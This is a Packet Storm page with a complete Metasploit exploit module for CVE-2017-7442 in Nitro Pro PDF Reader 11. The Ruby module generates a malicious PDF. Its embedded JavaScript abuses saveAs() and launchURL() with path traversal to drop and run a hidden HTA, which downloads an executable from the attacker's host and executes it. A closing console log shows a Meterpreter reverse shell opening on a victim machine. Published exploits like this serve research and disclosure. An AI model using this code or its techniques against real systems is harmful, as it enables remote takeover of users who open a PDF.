exploit the possibilities

Nitro Pro PDF Reader 11.0.3.173 Remote Code Execution

Nitro Pro PDF Reader 11.0.3.173 Remote Code Execution
Posted Aug 2, 2017
Authored by mr_me, sinn3r, Brendan Coles | Site metasploit.com

This Metasploit module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro PDF Reader version 11. The saveAs() Javascript API function allows for writing arbitrary files to the file system. Additionally, the launchURL() function allows an attacker to execute local files on the file system and bypass the security dialog Note: This is 100% reliable.

tags | exploit, arbitrary, local, javascript
advisories | CVE-2017-7442
MD5 | 18ea66b3d4ade909dbf22fe503cf7764

Nitro Pro PDF Reader 11.0.3.173 Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
'Description' => %q{
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
PDF Reader version 11. The saveAs() Javascript API function allows for writing
arbitrary files to the file system. Additionally, the launchURL() function allows
an attacker to execute local files on the file system and bypass the security dialog

Note: This is 100% reliable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
'Brendan Coles <bcoles [at] gmail.com>', # hidden hta tricks!
'sinn3r' # help with msf foo!
],
'References' =>
[
[ 'CVE', '2017-7442' ],
[ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ], # public advisory #1
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ], # public advisory #2 (verified and acquired by SSD)
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'Platform' => 'win',
'Targets' =>
[
# truly universal
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jul 24 2017',
'DefaultTarget' => 0))

register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
])
deregister_options('SSL', 'SSLVersion', 'SSLCert')
end

def build_vbs(url, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
vbs = %Q|<head><hta:application
applicationname="#{@payload_name}"
border="none"
borderstyle="normal"
caption="false"
contextmenu="false"
icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
maximizebutton="false"
minimizebutton="false"
navigable="false"
scroll="false"
selection="false"
showintaskbar="No"
sysmenu="false"
version="1.0"
windowstate="Minimize"></head>
<style>* { visibility: hidden; }</style>
<script language="VBScript">
window.resizeTo 1,1
window.moveTo -2000,-2000
</script>
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
<script language="VBScript">
On Error Resume Next
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
#{name_xmlhttp}.open "GET","http://#{url}",False
#{name_xmlhttp}.send
Set #{name_adodb} = CreateObject("ADODB.Stream")
#{name_adodb}.Open
#{name_adodb}.Type=1
#{name_adodb}.Write #{name_xmlhttp}.responseBody
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
set shellobj = CreateObject("wscript.shell")
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
</script>|
vbs.gsub!(/ /,'')
return vbs
end

def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending second stage payload")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
end

def exploit
# In order to save binary data to the file system the payload is written to a .vbs
# file and execute it from there.
@payload_name = rand_text_alpha(4)
@temp_folder = "/Windows/Temp"
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
if datastore['SRVHOST'] == '0.0.0.0'
lhost = Rex::Socket.source_address('50.50.50.50')
else
lhost = datastore['SRVHOST']
end
payload_src = lhost
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
stager_name = rand_text_alpha(6) + ".vbs"
pdf = %Q|%PDF-1.7
4 0 obj
<<
/Length 0
>>
stream
|
pdf << build_vbs(payload_src, stager_name)
pdf << %Q|
endstream endobj
5 0 obj
<<
/Type /Page
/Parent 2 0 R
/Contents 4 0 R
>>
endobj
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction [ 5 0 R /Fit ]
/Names <<
/JavaScript <<
/Names [ (EmbeddedJS)
<<
/S /JavaScript
/JS (
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
)
>>
]
>>
>>
>>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
endobj
3 0 obj
<<>>
endobj
xref
0 6
0000000000 65535 f
0000000166 00000 n
0000000244 00000 n
0000000305 00000 n
0000000009 00000 n
0000000058 00000 n
trailer <<
/Size 6
/Root 1 0 R
>>
startxref
327
%%EOF|
pdf.gsub!(/ /,'')
file_create(pdf)
super
end
end

=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
[*] Processing scripts/nitro.rc for ERB directives.
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/nitro.rc)> exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.175.1:4444
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.100.4:8080/
[*] Server started.
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
[*] Sending stage (957487 bytes) to 172.16.175.232
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
[+] Deleted C:/Windows/Temp/UOIr.hta

msf exploit(nitro_reader_jsapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2412 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\researcher\Desktop>
=end
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    9 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close